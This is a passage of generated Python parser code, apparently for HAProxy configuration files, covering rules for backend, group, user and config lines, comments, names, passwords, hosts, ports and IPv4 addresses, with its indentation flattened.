chunk3 = self._input[self._offset:self._offset + 6]
if chunk3 == 'unless':
address6 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"unless"')
if address6 is FAILURE:
self._offset = index4
if address6 is FAILURE:
address6 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_whitespace()
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
index5 = self._offset
address8 = self._read_backend_condition()
if address8 is FAILURE:
address8 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
index6 = self._offset
address9 = self._read_comment_text()
if address9 is FAILURE:
address9 = TreeNode(self._input[index6:index6], index6)
self._offset = index6
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
address10 = self._read_line_break()
if address10 is not FAILURE:
elements0.append(address10)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BackendLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['backend_line'][index0] = (address0, self._offset)
return address0
def _read_group_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['group_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 5]
if chunk0 == 'group':
address2 = TreeNode(self._input[self._offset:self._offset + 5], self._offset)
self._offset = self._offset + 5
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"group"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_group_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address7 = FAILURE
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 5]
if chunk1 == 'users':
address7 = TreeNode(self._input[self._offset:self._offset + 5], self._offset)
self._offset = self._offset + 5
else:
address7 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"users"')
if address7 is not FAILURE:
elements1.append(address7)
address8 = FAILURE
address8 = self._read_whitespace()
if address8 is not FAILURE:
elements1.append(address8)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address6 = FAILURE
else:
address6 = TreeNode19(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address9 = FAILURE
index4 = self._offset
address9 = self._read_value()
if address9 is FAILURE:
address9 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
index5 = self._offset
address10 = self._read_comment_text()
if address10 is FAILURE:
address10 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address10 is not FAILURE:
elements0.append(address10)
address11 = FAILURE
address11 = self._read_line_break()
if address11 is not FAILURE:
elements0.append(address11)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = GroupLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['group_line'][index0] = (address0, self._offset)
return address0
def _read_user_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['user_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 4]
if chunk0 == 'user':
address2 = TreeNode(self._input[self._offset:self._offset + 4], self._offset)
self._offset = self._offset + 4
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"user"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_user_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 8]
if chunk1 == 'password':
address6 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"password"')
if address6 is FAILURE:
self._offset = index2
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 17]
if chunk2 == 'insecure-password':
address6 = TreeNode(self._input[self._offset:self._offset + 17], self._offset)
self._offset = self._offset + 17
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"insecure-password"')
if address6 is FAILURE:
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_whitespace()
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_password()
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_whitespace()
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
index3 = self._offset
index4, elements1 = self._offset, []
address11 = FAILURE
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 6]
if chunk3 == 'groups':
address11 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address11 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"groups"')
if address11 is not FAILURE:
elements1.append(address11)
address12 = FAILURE
address12 = self._read_whitespace()
if address12 is not FAILURE:
elements1.append(address12)
else:
elements1 = None
self._offset = index4
else:
elements1 = None
self._offset = index4
if elements1 is None:
address10 = FAILURE
else:
address10 = TreeNode21(self._input[index4:self._offset], index4, elements1)
self._offset = self._offset
if address10 is FAILURE:
address10 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address10 is not FAILURE:
elements0.append(address10)
address13 = FAILURE
index5 = self._offset
address13 = self._read_value()
if address13 is FAILURE:
address13 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address13 is not FAILURE:
elements0.append(address13)
address14 = FAILURE
index6 = self._offset
address14 = self._read_comment_text()
if address14 is FAILURE:
address14 = TreeNode(self._input[index6:index6], index6)
self._offset = index6
if address14 is not FAILURE:
elements0.append(address14)
address15 = FAILURE
address15 = self._read_line_break()
if address15 is not FAILURE:
elements0.append(address15)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = UserLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['user_line'][index0] = (address0, self._offset)
return address0
def _read_config_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['config_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
index3 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'defaults':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"defaults"')
if address2 is FAILURE:
self._offset = index3
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 6]
if chunk1 == 'global':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"global"')
if address2 is FAILURE:
self._offset = index3
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 8]
if chunk2 == 'userlist':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"userlist"')
if address2 is FAILURE:
self._offset = index3
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 6]
if chunk3 == 'listen':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"listen"')
if address2 is FAILURE:
self._offset = index3
chunk4 = None
if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 8]
if chunk4 == 'frontend':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"frontend"')
if address2 is FAILURE:
self._offset = index3
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 7]
if chunk5 == 'backend':
address2 = TreeNode(self._input[self._offset:self._offset + 7], self._offset)
self._offset = self._offset + 7
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"backend"')
if address2 is FAILURE:
self._offset = index3
self._offset = index2
if address2 is FAILURE:
address2 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_keyword()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_whitespace()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
index4 = self._offset
address5 = self._read_value()
if address5 is FAILURE:
address5 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index5 = self._offset
address6 = self._read_comment_text()
if address6 is FAILURE:
address6 = TreeNode(self._input[index5:index5], index5)
self._offset = index5
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_line_break()
if address7 is not FAILURE:
elements0.append(address7)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ConfigLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['config_line'][index0] = (address0, self._offset)
return address0
def _read_comment_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['comment_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_comment_text()
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_line_break()
if address3 is not FAILURE:
elements0.append(address3)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = CommentLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['comment_line'][index0] = (address0, self._offset)
return address0
def _read_blank_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['blank_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_line_break()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BlankLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['blank_line'][index0] = (address0, self._offset)
return address0
def _read_comment_text(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['comment_text'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '#':
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"#"')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
remaining0, index2, elements1, address3 = 0, self._offset, [], True
while address3 is not FAILURE:
address3 = self._read_char()
if address3 is not FAILURE:
elements1.append(address3)
remaining0 -= 1
if remaining0 <= 0:
address2 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
address4 = FAILURE
index3 = self._offset
address4 = self._read_line_break()
self._offset = index3
if address4 is not FAILURE:
address4 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['comment_text'][index0] = (address0, self._offset)
return address0
def _read_line_break(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['line_break'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_1.search(chunk0):
address0 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\n]')
self._cache['line_break'][index0] = (address0, self._offset)
return address0
def _read_keyword(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['keyword'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
index2 = self._offset
index3, elements1 = self._offset, []
address2 = FAILURE
index4 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 9]
if chunk0 == 'errorfile':
address2 = TreeNode(self._input[self._offset:self._offset + 9], self._offset)
self._offset = self._offset + 9
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"errorfile"')
if address2 is FAILURE:
self._offset = index4
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 7]
if chunk1 == 'timeout':
address2 = TreeNode(self._input[self._offset:self._offset + 7], self._offset)
self._offset = self._offset + 7
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"timeout"')
if address2 is FAILURE:
self._offset = index4
if address2 is not FAILURE:
elements1.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements1.append(address3)
else:
elements1 = None
self._offset = index3
else:
elements1 = None
self._offset = index3
if elements1 is None:
address1 = FAILURE
else:
address1 = Keyword(self._input[index3:self._offset], index3, elements1)
self._offset = self._offset
if address1 is FAILURE:
address1 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address1 is not FAILURE:
elements0.append(address1)
address4 = FAILURE
remaining0, index5, elements2, address5 = 1, self._offset, [], True
while address5 is not FAILURE:
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 is not None and Grammar.REGEX_2.search(chunk2):
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-z0-9\\-\\_\\.]')
if address5 is not FAILURE:
elements2.append(address5)
remaining0 -= 1
if remaining0 <= 0:
address4 = TreeNode(self._input[index5:self._offset], index5, elements2)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements0.append(address4)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['keyword'][index0] = (address0, self._offset)
return address0
def _read_server_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['server_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_3.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['server_name'][index0] = (address0, self._offset)
return address0
def _read_acl_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['acl_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_4.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['acl_name'][index0] = (address0, self._offset)
return address0
def _read_backend_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_5.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['backend_name'][index0] = (address0, self._offset)
return address0
def _read_group_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['group_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_6.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['group_name'][index0] = (address0, self._offset)
return address0
def _read_user_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['user_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_7.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['user_name'][index0] = (address0, self._offset)
return address0
def _read_password(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['password'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_8.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^#\\n]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['password'][index0] = (address0, self._offset)
return address0
def _read_backend_condition(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_condition'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_9.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^#\\n]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['backend_condition'][index0] = (address0, self._offset)
return address0
def _read_service_address(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['service_address'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_host()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_10.search(chunk0):
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[:]')
if address2 is FAILURE:
address2 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_port()
if address3 is not FAILURE:
elements0.append(address3)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ServiceAddress(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['service_address'][index0] = (address0, self._offset)
return address0
def _read_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
address0 = self._read_ipv4_host()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_dns_host()
if address0 is FAILURE:
self._offset = index1
address0 = self._read_wildcard_host()
if address0 is FAILURE:
self._offset = index1
self._cache['host'][index0] = (address0, self._offset)
return address0
def _read_port(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['port'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_11.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['port'][index0] = (address0, self._offset)
return address0
def _read_ipv4_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['ipv4_host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
remaining0, index2, elements1, address2 = 1, self._offset, [], True
while address2 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_12.search(chunk0):
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address2 is not FAILURE:
elements1.append(address2)
remaining0 -= 1
if remaining0 <= 0:
address1 = TreeNode(self._input[index2:self._offset], index2, elements1)
self._offset = self._offset
else:
address1 = FAILURE
if address1 is not FAILURE:
elements0.append(address1)
address3 = FAILURE
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 1]
if chunk1 == '.':
address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"."')
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
remaining1, index3, elements2, address5 = 1, self._offset, [], True
while address5 is not FAILURE:
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 1]
if chunk2 is not None and Grammar.REGEX_13.search(chunk2):
address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address5 is not FAILURE:
elements2.append(address5)
remaining1 -= 1
if remaining1 <= 0:
address4 = TreeNode(self._input[index3:self._offset], index3, elements2)
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements0.append(address4)
address6 = FAILURE
chunk3 = None
if self._offset < self._input_size:
chunk3 = self._input[self._offset:self._offset + 1]
if chunk3 == '.':
address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"."')
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
remaining2, index4, elements3, address8 = 1, self._offset, [], True
while address8 is not FAILURE:
chunk4 = None
if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 1]
if chunk4 is not None and Grammar.REGEX_14.search(chunk4):
address8 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address8 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address8 is not FAILURE:
elements3.append(address8)
